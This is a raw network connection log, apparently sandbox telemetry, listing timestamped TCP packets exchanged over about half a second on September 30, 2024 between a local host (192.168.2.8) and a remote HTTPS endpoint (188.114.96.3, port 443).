Sep 30, 2024 18:19:12.800893068 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.801007986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.801014900 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.801064014 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.801386118 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.801403999 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.801481962 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.801481962 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.801489115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.801533937 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.802731037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.802748919 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.802818060 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.802824974 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.802877903 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.803308010 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.803328037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.803404093 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.803410053 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.803452015 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.803621054 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.803670883 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.803715944 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.803715944 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.803726912 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.803772926 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.803956032 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.803976059 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.804029942 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.804038048 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.804078102 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.805164099 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.805182934 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.805255890 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.805262089 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.805319071 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.884923935 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.884946108 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.885029078 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.885029078 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.885040998 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.885104895 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.888046026 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.888063908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.888156891 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.888164043 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.888238907 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.888931990 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.888950109 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.889005899 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.889013052 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.889049053 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.889049053 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.890194893 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.890213013 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.890284061 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.890290976 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.890342951 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.890614986 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.890630007 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.890700102 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.890706062 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.890777111 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.890935898 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.890949965 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.891004086 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.891010046 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.891031981 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.891053915 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.891339064 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.891352892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.891407013 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.891412973 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.891478062 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.893225908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.893241882 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.893321991 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.893328905 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.893374920 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.972767115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.972790003 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.972979069 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.972995043 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.973035097 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.975625038 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.975646973 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.975732088 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.975739956 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.975785017 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.976576090 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.976594925 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.976663113 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.976670027 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.976720095 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.977801085 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.977819920 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.977874041 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.977881908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.977893114 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.977935076 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978087902 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978105068 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978166103 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978172064 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978180885 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978251934 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978482008 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978497028 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978538036 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978543997 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978579998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978579998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978868008 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978883028 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978949070 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.978955030 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.978993893 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.980401993 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.980417967 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.980485916 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.980492115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.980535984 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.060417891 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.060439110 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.060570955 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.060585976 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.060647964 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.063482046 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.063500881 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.063585043 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.063591957 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.063647032 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.064508915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.064524889 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.064568996 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.064577103 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.064615965 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.064615965 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.065345049 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.065361023 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.065418005 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.065424919 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.065471888 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.066220045 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.066236973 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.066374063 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.066380978 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.066437006 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.066540003 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.066555977 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.066608906 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.066615105 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.066657066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.066657066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.066940069 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.066956043 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.067030907 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.067037106 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.067048073 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.067070007 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.068322897 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.068340063 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.068464994 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.068473101 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.068568945 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.111952066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.147943974 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.147965908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.148097992 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.148108959 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.148159027 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.151180029 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.151201010 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.151276112 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.151283026 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.151403904 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.152168989 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.152188063 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.152229071 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.152235031 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.152276993 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.153009892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153026104 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153081894 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.153090954 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153130054 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.153496981 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153512001 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153583050 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.153589010 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153610945 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.153623104 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.153901100 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153914928 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.153975964 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.153989077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.154038906 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.154220104 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.154234886 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.154297113 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.154304028 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.154345989 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.155931950 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.155946970 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.155985117 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.155991077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.156013966 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.156035900 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.156616926 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.235645056 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.235665083 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.235752106 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.235764027 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.235852957 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.238914013 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.238934040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.239031076 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.239038944 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.239173889 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.239826918 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.239842892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.239892960 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.239901066 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.239950895 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.240756035 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.240776062 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.240816116 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.240822077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.240853071 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.240853071 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.241134882 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241148949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241241932 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.241249084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241318941 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.241492987 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241509914 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241596937 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.241604090 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241667986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.241878986 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241894007 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241930962 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.241938114 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.241970062 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.241970062 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.243535042 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.243558884 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.243628025 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.243628025 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.243634939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.243726969 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.323513985 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.323534012 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.323662996 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.323673010 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.323731899 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.326879025 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.326899052 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.326988935 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.326997042 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.327059031 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.327672005 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.327692986 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.327797890 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.327804089 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.327923059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.328367949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.328387976 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.328444958 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.328444958 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.328454018 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.328490019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.328777075 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.328793049 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.328893900 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.328901052 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.329099894 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.329164982 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.329180002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.329233885 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.329241991 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.329318047 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.329464912 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.329482079 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.329530954 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.329538107 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.329601049 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.331048012 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.331070900 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.331137896 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.331137896 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.331146002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.331267118 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.411515951 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.411577940 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.411631107 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.411631107 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.411643028 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.411675930 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.414565086 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.414627075 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.414627075 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.414657116 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.414680004 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.414690018 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.415565014 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.415613890 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.415636063 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.415643930 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.415679932 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.415708065 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416055918 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.416096926 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.416130066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416136980 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.416148901 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416177988 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416451931 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.416492939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.416511059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416517973 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.416528940 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416564941 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416564941 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.416945934 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.416985989 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.417010069 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.417016983 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.417037010 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.417047977 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.417315006 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.417357922 CEST	443	49706	188.114.96.3	192.168.2.8
